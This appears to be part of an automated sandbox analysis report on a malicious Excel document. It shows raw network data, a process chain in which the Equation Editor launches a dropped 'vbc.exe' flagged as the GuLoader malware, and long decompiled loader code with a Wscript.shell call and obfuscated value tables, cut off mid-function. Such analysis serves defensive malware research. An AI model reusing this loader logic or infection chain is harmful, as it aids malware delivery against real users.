Sep 13, 2021 20:16:54.950273991 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 13, 2021 20:16:54.950309992 CEST	6	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 13, 2021 20:16:54.980690956 CEST	7	IN	Data Raw: 40 00 ff 25 d4 10 40 00 ff 25 00 10 40 00 ff 25 f0 10 40 00 ff 25 a0 10 40 00 ff 25 54 10 40 00 ff 25 80 10 40 00 ff 25 e4 10 40 00 ff 25 e0 10 40 00 ff 25 9c 10 40 00 ff 25 2c 10 40 00 ff 25 c0 10 40 00 ff 25 38 10 40 00 ff 25 1c 10 40 00 ff 25 Data Ascii: @%@%@%@%@%T@%@%@%@%@%,@%@%8@%@%4@%@%t@%@%@%@%@%0@%@%(@%L@%@%@%d@%@%H@%@%`@%@%\|@%P@%h@%@%@%@%@%l@
Sep 13, 2021 20:16:54.980767012 CEST	8	IN	Data Raw: 10 6f 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 19 40 00 01 00 00 00 d4 33 40 00 00 00 00 00 2c 19 40 00 01 00 00 00 34 19 40 00 00 00 00 00 30 19 40 00 01 00 00 00 34 19 40 00 00 00 b7 01 68 00 6c 00 5c 19 40 00 2c dd 41 00 00 00 00 00 9c cd Data Ascii: oo,@3@,@4@0@4@hl\@,Ap3@3@@4.@\@tm/@4@@@@@
Sep 13, 2021 20:16:54.980850935 CEST	10	IN	Data Raw: 41 00 00 00 00 00 ec cd 70 00 24 34 40 00 34 34 40 00 40 00 1f 00 34 00 00 00 f8 2e 40 00 ff ff ff ff 00 00 00 00 00 00 00 00 4c 1e 40 00 f0 74 6d 00 08 2f 40 00 ff ff ff ff 00 00 00 00 24 1e 40 00 a4 1d 40 00 a2 14 40 00 a8 14 40 00 ae 14 40 00 Data Ascii: Ap$4@44@@4.@L@tm/@$@@@@@\+@8A,@lA
Sep 13, 2021 20:16:54.980890036 CEST	11	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 16 40 00 01 00 00 00 50 00 00 00 87 68 0e 39 16 82 Data Ascii: @Ph9C2k@LP,GtNr7E\|dX,9@Pn}7
Sep 13, 2021 20:16:54.980959892 CEST	13	IN	Data Raw: 40 00 a2 14 40 00 a8 14 40 00 ae 14 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@@@4'@d&@@@@\'@d&@@@@
Sep 13, 2021 20:16:54.981008053 CEST	14	IN	Data Raw: 4d 41 4e 4c 49 4b 45 00 55 44 4d 4e 54 45 44 45 53 00 00 00 4c 49 56 53 53 54 52 41 46 46 45 53 00 00 00 00 56 49 4e 44 49 4e 47 45 52 00 00 00 55 e4 40 8d b5 6f a8 4d b1 27 43 69 00 a3 74 1c ad 7e a8 50 43 91 84 43 be 6d 4b 71 aa c5 7a a6 87 68 Data Ascii: MANLIKEUDMNTEDESLIVSSTRAFFESVINDINGERU@oM'Cit~PCCmKqzh9C2k[[tWE6(FN3f`Frame3.=h8+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLBVBH.@X.@.@A
Sep 13, 2021 20:16:54.981044054 CEST	15	IN	Data Raw: d7 45 a1 26 bf d6 90 71 27 b4 8b f7 19 6f 64 e2 4b 42 b4 ca 34 a1 d4 d4 e7 bd 47 70 0c 4b f7 ee 79 44 a9 a3 2e f5 01 a2 51 18 70 9b 6c 6b 9d 8c ae 44 ae 44 44 d1 14 fa 35 fc 45 25 07 43 47 e7 05 44 82 bc 4a aa 2b bd cf cb f0 72 02 1b 3a 9e 7a 4f Data Ascii: E&q'odKB4GpKyD.QplkDDD5E%CGDJ+r:zOG"Aaf9HI6`HI(scD1S ^:MUiN 'Y%("H0W(zGUF!T]HkyI(2~,~_@I}FJ M

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1296 Parent PID: 596

General

Start time:	20:16:19
Start date:	13/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fd80000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1532 Parent PID: 596

General

Start time:	20:16:41
Start date:	13/09/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2604 Parent PID: 1532

General

Start time:	20:16:42
Start date:	13/09/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	139264 bytes
MD5 hash:	B7E5ACDADE5630DBF1AB4B211DDC16DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 18%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2604 Parent PID: 1532 vbc.exeCOMMON

Executed Functions

Function 00326A91, Relevance: 1.7, APIs: 1, Instructions: 227memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-68635C8F,?,B373CF1C), ref: 00326BE2

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: da3dd4a5b1b547e5e9fc7be5510d504ce610cd8fe3e5c8a491364dc0666367aa
Instruction ID: 65f1f582045ad06a24393de706fb0a4b996bfa9d326d1021783ce0067a0c31a0
Opcode Fuzzy Hash: da3dd4a5b1b547e5e9fc7be5510d504ce610cd8fe3e5c8a491364dc0666367aa
Instruction Fuzzy Hash: 2281467060939D9FCB26CF74EC913DA7BA1FF95300F64416AEC8A9B216CB318942CB51

Uniqueness

Uniqueness Score: -1.00%

Function 003269C1, Relevance: 1.7, APIs: 1, Instructions: 213memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-68635C8F,?,B373CF1C), ref: 00326BE2

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 15fc073edcb5a1e03b77bdcbf22e70f0c94a1b906808abe15183df75061779df
Instruction ID: f634f3e7eed85b63c5824e300e7ff8ca2690e5fa14c5070d578e115ca03f7b35
Opcode Fuzzy Hash: 15fc073edcb5a1e03b77bdcbf22e70f0c94a1b906808abe15183df75061779df
Instruction Fuzzy Hash: EC8104706043998FCB25DF74EC817DA7BA2FF99350F64812AEC899B215DB308A42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00326928, Relevance: 1.7, APIs: 1, Instructions: 172memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-68635C8F,?,B373CF1C), ref: 00326BE2

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 8207f59070f9752001f166e3f0eff9b7e655e8b4cb5f457746e79b61245243ef
Instruction ID: c0c50238a19a808f75300711d66809b8a5c74529745049b023cf4e06189d347c
Opcode Fuzzy Hash: 8207f59070f9752001f166e3f0eff9b7e655e8b4cb5f457746e79b61245243ef
Instruction Fuzzy Hash: F75127B15083889FDF32CF35EC417DA7BA1EFA9304F18415AEC498B266DB348A45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00326B75, Relevance: 1.6, APIs: 1, Instructions: 146memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-68635C8F,?,B373CF1C), ref: 00326BE2

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: ba7b5bf000e9519a8f18208be0db4f516b1e9be78a3917648fec1213b31adf3b
Instruction ID: 1466dbdece48c8b75d67e1eed5cf8db389f9e3322affdd2f0a4eae3e99fa583f
Opcode Fuzzy Hash: ba7b5bf000e9519a8f18208be0db4f516b1e9be78a3917648fec1213b31adf3b
Instruction Fuzzy Hash: 4851287060429D9FCF25DF74E8913EE7BA5FF89351F94412AEC8A9B205CB308942CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00402B34, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402B34(void* __ebx, void* __edi, void* __esi, signed long long __fp0, signed int _a4) {
				intOrPtr* _v0;
				signed int _v8;
				intOrPtr _v12;
				signed long long* _v16;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				short _v40;
				short _v44;
				short _v48;
				char _v52;
				char _v56;
				signed int _v60;
				intOrPtr _v64;
				signed long long* _v68;
				signed int _v72;
				char _v76;
				signed long long _v80;
				signed int _v84;
				char _v88;
				intOrPtr _v96;
				char _v104;
				signed long long _v120;
				char _v124;
				intOrPtr _v144;
				char _v152;
				void* _v156;
				char _v160;
				signed int _v164;
				signed int _v168;
				void* _v172;
				signed int _v176;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int* _v660;
				signed int _v664;
				signed int _v668;
				signed int* _v672;
				signed int _v676;
				signed int _v680;
				signed int* _v684;
				signed int _v688;
				signed int _v692;
				signed int* _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int* _v716;
				signed int _v720;
				signed int _v724;
				signed int _t1308;
				intOrPtr _t1310;
				signed int _t1323;
				signed int _t1333;
				signed int _t1338;
				char* _t1341;
				signed int _t1347;
				signed int _t1352;
				signed int _t1359;
				signed int _t1364;
				signed int _t1368;
				signed int _t1369;
				signed int _t1370;
				signed int _t1371;
				signed int _t1372;
				signed int _t1373;
				signed int _t1374;
				signed int _t1375;
				signed int _t1376;
				signed int _t1377;
				signed int _t1378;
				signed int _t1379;
				signed int _t1380;
				signed int _t1381;
				signed int _t1382;
				signed int _t1383;
				signed int _t1384;
				signed int _t1385;
				signed int _t1386;
				signed int _t1387;
				signed int _t1388;
				signed int _t1389;
				signed int _t1390;
				signed int _t1391;
				signed int _t1392;
				signed int _t1393;
				signed int _t1394;
				signed int _t1395;
				signed int _t1396;
				signed int _t1397;
				signed int _t1398;
				signed int _t1399;
				signed int _t1400;
				signed int _t1401;
				signed int _t1402;
				signed int _t1403;
				signed int _t1404;
				signed int _t1405;
				signed int _t1406;
				signed int _t1407;
				signed int _t1408;
				signed int _t1409;
				signed int _t1410;
				signed int _t1411;
				signed int _t1412;
				signed int _t1413;
				signed int _t1414;
				signed int _t1415;
				signed int _t1416;
				signed int _t1417;
				signed int _t1418;
				signed int _t1419;
				signed int _t1420;
				signed int _t1421;
				signed int _t1422;
				signed int _t1423;
				signed int _t1424;
				signed int _t1425;
				signed int _t1426;
				signed int _t1427;
				signed int _t1428;
				signed int _t1429;
				signed int _t1430;
				signed int _t1431;
				signed int _t1432;
				signed int _t1433;
				signed int _t1434;
				signed int _t1435;
				signed int _t1436;
				signed int _t1437;
				signed int _t1438;
				signed int _t1439;
				signed int _t1440;
				signed int _t1441;
				signed int _t1442;
				signed int _t1443;
				signed int _t1444;
				signed int _t1445;
				signed int _t1446;
				signed int _t1447;
				signed int _t1448;
				signed int _t1449;
				signed int _t1450;
				signed int _t1451;
				signed int _t1452;
				signed int _t1453;
				signed int _t1454;
				signed int _t1455;
				signed int _t1456;
				signed int _t1457;
				signed int _t1458;
				signed int _t1459;
				signed int _t1460;
				signed int _t1461;
				signed int _t1462;
				signed int _t1463;
				signed int _t1464;
				signed int _t1465;
				signed int _t1466;
				signed int _t1467;
				signed int _t1468;
				signed int _t1469;
				signed int _t1470;
				signed int _t1471;
				signed int _t1472;
				signed int _t1473;
				signed int _t1474;
				signed int _t1475;
				signed int _t1476;
				signed int _t1477;
				signed int _t1478;
				signed int _t1479;
				signed int _t1480;
				signed int _t1481;
				signed int _t1482;
				signed int _t1483;
				signed int _t1484;
				signed int _t1492;
				signed int _t1496;
				signed int _t1502;
				signed int _t1509;
				char* _t1511;
				char* _t1512;
				void* _t1513;
				void* _t1648;
				void* _t1649;
				signed int _t1650;
				signed int _t1651;
				void* _t1652;
				void* _t1653;
				void* _t1655;
				signed long long* _t1656;
				signed long long* _t1657;
				signed long long _t1664;
				signed long long _t1665;

				_t1664 = __fp0;
				_t1649 = __esi;
				_t1648 = __edi;
				_t1513 = __ebx;
				_a4 = _a4 - 0x4b;
				_t1653 = _t1655;
				_t1656 = _t1655 - 0xc;
				 *[fs:0x0] = _t1656;
				L00401340();
				_v16 = _t1656;
				_v12 = 0x401108;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401346, _t1652);
				_t1308 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
				asm("fclex");
				_v60 = _t1308;
				if(_v60 >= 0) {
					_t20 =  &_v72;
					 *_t20 = _v72 & 0x00000000;
					__eflags =  *_t20;
				} else {
					_push(0x2b4);
					_push(0x402df0);
					_push(_a4);
					_push(_v60);
					L0040149C();
					_v72 = _t1308;
				}
				_v32 = 0x30bb308;
				asm("fild dword [ebp-0x1c]");
				_v80 = _t1664;
				_t1665 = _v80;
				if( *0x41d000 != 0) {
					_push( *0x401104);
					_push( *0x401100);
					L00401364();
				} else {
					_t1665 = _t1665 /  *0x401100;
				}
				L00401496();
				_v32 = _t1308;
				while(1) {
					_t1310 = _v28 + 1;
					if(_t1310 < 0) {
						break;
					}
					_v28 = _t1310;
					_t1509 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v56);
					_v60 = _t1509;
					if(_v60 >= 0) {
						_t37 =  &_v84;
						 *_t37 = _v84 & 0x00000000;
						__eflags =  *_t37;
					} else {
						_push(0x6f8);
						_push(0x402e20);
						_push(_a4);
						_push(_v60);
						L0040149C();
						_v84 = _t1509;
					}
					if(_v28 >= 0x1e8480) {
						_push(0);
						_push(L"Wscript.shell");
						_push( &_v52); // executed
						L00401484(); // executed
						_t1511 =  &_v52;
						_push(_t1511);
						L0040148A();
						_push(_t1511);
						_t1512 =  &_v36;
						_push(_t1512);
						L00401490();
						L0040147E();
						_v32 = 0xc0177;
						_t1650 = 0;
						__eflags = 0;
						do {
							_t1650 = _t1650 + 1;
							__eflags = _t1650 - 0x36fd1e;
						} while (_t1650 != 0x36fd1e);
						_t1651 = _t1650 + 0x9fc78;
						__eflags = _t1651;
						_push(_t1513);
						_push(_t1512);
						_push(_t1651);
						return _t1512;
					} else {
						continue;
					}
					L424:
				}
				L00401472();
				_t1657 = _t1656 - 0xc;
				 *[fs:0x0] = _t1657;
				L00401340();
				_v68 = _t1657;
				_v64 = 0x401138;
				_v60 = 0;
				 *((intOrPtr*)( *_v48 + 4))(_v48, _t1648, _t1649, _t1513,  *[fs:0x0], 0x401346, _t1653);
				_push(3);
				_push(0x402fec);
				_push( &_v124);
				L0040146C();
				_v160 = 0x80020004;
				_v168 = 0xa;
				_v144 = 0x80020004;
				_v152 = 0xa;
				_push( &_v168);
				_push( &_v152);
				asm("fld1");
				_push(_t1514);
				_v120 = _t1665;
				asm("fld1");
				_push(_t1514);
				_push(_t1514);
				 *_t1657 = _t1665;
				asm("fld1");
				_push(_t1514);
				_push(_t1514);
				 *_t1657 = _t1665;
				L00401460();
				L00401466();
				asm("fcomp qword [0x401130]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t59 =  &_v188;
					 *_t59 = _v188 & 0x00000000;
					__eflags =  *_t59;
				} else {
					_v188 = 1;
				}
				_v164 =  ~_v188;
				_push( &_v120);
				_push( &_v104);
				_push(2);
				L0040145A();
				_t1323 = _v164;
				__eflags = _t1323;
				if(_t1323 != 0) {
					_v164 = _v164 & 0x00000000;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v192 = _t1323;
					} else {
						_v192 = _v192 & 0x00000000;
					}
					_t1369 = _v164;
					 *((intOrPtr*)(_v64 + _t1369 * 4)) = 0x69b597;
					_v164 = 1;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v196 = _t1369;
					} else {
						_v196 = _v196 & 0x00000000;
					}
					_t1370 = _v164;
					 *((intOrPtr*)(_v64 + _t1370 * 4)) = 0xaedc8;
					_v164 = 2;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v200 = _t1370;
					} else {
						_v200 = _v200 & 0x00000000;
					}
					_t1371 = _v164;
					 *((intOrPtr*)(_v64 + _t1371 * 4)) = 0x62c1b2;
					_v164 = 3;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v204 = _t1371;
					} else {
						_v204 = _v204 & 0x00000000;
					}
					_t1372 = _v164;
					 *((intOrPtr*)(_v64 + _t1372 * 4)) = 0x6b3da8;
					_v164 = 4;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v208 = _t1372;
					} else {
						_v208 = _v208 & 0x00000000;
					}
					_t1373 = _v164;
					 *((intOrPtr*)(_v64 + _t1373 * 4)) = 0x5146e3;
					_v164 = 5;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v212 = _t1373;
					} else {
						_v212 = _v212 & 0x00000000;
					}
					_t1374 = _v164;
					 *((intOrPtr*)(_v64 + _t1374 * 4)) = 0x311f69;
					_v164 = 6;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v216 = _t1374;
					} else {
						_v216 = _v216 & 0x00000000;
					}
					_t1375 = _v164;
					 *((intOrPtr*)(_v64 + _t1375 * 4)) = 0x7bd148;
					_v164 = 7;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v220 = _t1375;
					} else {
						_v220 = _v220 & 0x00000000;
					}
					_t1376 = _v164;
					 *((intOrPtr*)(_v64 + _t1376 * 4)) = 0x3b7345;
					_v164 = 8;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v224 = _t1376;
					} else {
						_v224 = _v224 & 0x00000000;
					}
					_t1377 = _v164;
					 *((intOrPtr*)(_v64 + _t1377 * 4)) = 0x2779c1;
					_v164 = 9;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v228 = _t1377;
					} else {
						_v228 = _v228 & 0x00000000;
					}
					_t1378 = _v164;
					 *((intOrPtr*)(_v64 + _t1378 * 4)) = 0x4dbb7e;
					_v164 = 0xa;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v232 = _t1378;
					} else {
						_v232 = _v232 & 0x00000000;
					}
					_t1379 = _v164;
					 *((intOrPtr*)(_v64 + _t1379 * 4)) = 0x580b8e;
					_v164 = 0xb;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v236 = _t1379;
					} else {
						_v236 = _v236 & 0x00000000;
					}
					_t1380 = _v164;
					 *((intOrPtr*)(_v64 + _t1380 * 4)) = 0x32edf0;
					_v164 = 0xc;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v240 = _t1380;
					} else {
						_v240 = _v240 & 0x00000000;
					}
					_t1381 = _v164;
					 *((intOrPtr*)(_v64 + _t1381 * 4)) = 0x22e592;
					_v164 = 0xd;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v244 = _t1381;
					} else {
						_v244 = _v244 & 0x00000000;
					}
					_t1382 = _v164;
					 *((intOrPtr*)(_v64 + _t1382 * 4)) = 0x4ee565;
					_v164 = 0xe;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v248 = _t1382;
					} else {
						_v248 = _v248 & 0x00000000;
					}
					_t1383 = _v164;
					 *((intOrPtr*)(_v64 + _t1383 * 4)) = 0x13469e;
					_v164 = 0xf;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v252 = _t1383;
					} else {
						_v252 = _v252 & 0x00000000;
					}
					_t1384 = _v164;
					 *((intOrPtr*)(_v64 + _t1384 * 4)) = 0x4b6ac6;
					_v164 = 0x10;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v256 = _t1384;
					} else {
						_v256 = _v256 & 0x00000000;
					}
					_t1385 = _v164;
					 *((intOrPtr*)(_v64 + _t1385 * 4)) = 0x813d54;
					_v164 = 0x11;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v260 = _t1385;
					} else {
						_v260 = _v260 & 0x00000000;
					}
					_t1386 = _v164;
					 *((intOrPtr*)(_v64 + _t1386 * 4)) = 0xd6da7;
					_v164 = 0x12;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v264 = _t1386;
					} else {
						_v264 = _v264 & 0x00000000;
					}
					_t1387 = _v164;
					 *((intOrPtr*)(_v64 + _t1387 * 4)) = 0x9510d;
					_v164 = 0x13;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v268 = _t1387;
					} else {
						_v268 = _v268 & 0x00000000;
					}
					_t1388 = _v164;
					 *((intOrPtr*)(_v64 + _t1388 * 4)) = 0x4811a6;
					_v164 = 0x14;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v272 = _t1388;
					} else {
						_v272 = _v272 & 0x00000000;
					}
					_t1389 = _v164;
					 *((intOrPtr*)(_v64 + _t1389 * 4)) = 0x87f6fb;
					_v164 = 0x15;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v276 = _t1389;
					} else {
						_v276 = _v276 & 0x00000000;
					}
					_t1390 = _v164;
					 *((intOrPtr*)(_v64 + _t1390 * 4)) = 0x258aef;
					_v164 = 0x16;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v280 = _t1390;
					} else {
						_v280 = _v280 & 0x00000000;
					}
					_t1391 = _v164;
					 *((intOrPtr*)(_v64 + _t1391 * 4)) = 0x711813;
					_v164 = 0x17;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v284 = _t1391;
					} else {
						_v284 = _v284 & 0x00000000;
					}
					_t1392 = _v164;
					 *((intOrPtr*)(_v64 + _t1392 * 4)) = 0x5aae91;
					_v164 = 0x18;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v288 = _t1392;
					} else {
						_v288 = _v288 & 0x00000000;
					}
					_t1393 = _v164;
					 *((intOrPtr*)(_v64 + _t1393 * 4)) = 0x55ed18;
					_v164 = 0x19;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v292 = _t1393;
					} else {
						_v292 = _v292 & 0x00000000;
					}
					_t1394 = _v164;
					 *((intOrPtr*)(_v64 + _t1394 * 4)) = 0x4342cb;
					_v164 = 0x1a;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v296 = _t1394;
					} else {
						_v296 = _v296 & 0x00000000;
					}
					_t1395 = _v164;
					 *((intOrPtr*)(_v64 + _t1395 * 4)) = 0x77a35;
					_v164 = 0x1b;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v300 = _t1395;
					} else {
						_v300 = _v300 & 0x00000000;
					}
					_t1396 = _v164;
					 *((intOrPtr*)(_v64 + _t1396 * 4)) = 0x4f4356;
					_v164 = 0x1c;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v304 = _t1396;
					} else {
						_v304 = _v304 & 0x00000000;
					}
					_t1397 = _v164;
					 *((intOrPtr*)(_v64 + _t1397 * 4)) = 0x28b054;
					_v164 = 0x1d;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v308 = _t1397;
					} else {
						_v308 = _v308 & 0x00000000;
					}
					_t1398 = _v164;
					 *((intOrPtr*)(_v64 + _t1398 * 4)) = 0x3fccc5;
					_v164 = 0x1e;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v312 = _t1398;
					} else {
						_v312 = _v312 & 0x00000000;
					}
					_t1399 = _v164;
					 *((intOrPtr*)(_v64 + _t1399 * 4)) = 0x39b98e;
					_v164 = 0x1f;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v316 = _t1399;
					} else {
						_v316 = _v316 & 0x00000000;
					}
					_t1400 = _v164;
					 *((intOrPtr*)(_v64 + _t1400 * 4)) = 0x75eb0d;
					_v164 = 0x20;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v320 = _t1400;
					} else {
						_v320 = _v320 & 0x00000000;
					}
					_t1401 = _v164;
					 *((intOrPtr*)(_v64 + _t1401 * 4)) = 0x4d8239;
					_v164 = 0x21;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v324 = _t1401;
					} else {
						_v324 = _v324 & 0x00000000;
					}
					_t1402 = _v164;
					 *((intOrPtr*)(_v64 + _t1402 * 4)) = 0x4ea203;
					_v164 = 0x22;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v328 = _t1402;
					} else {
						_v328 = _v328 & 0x00000000;
					}
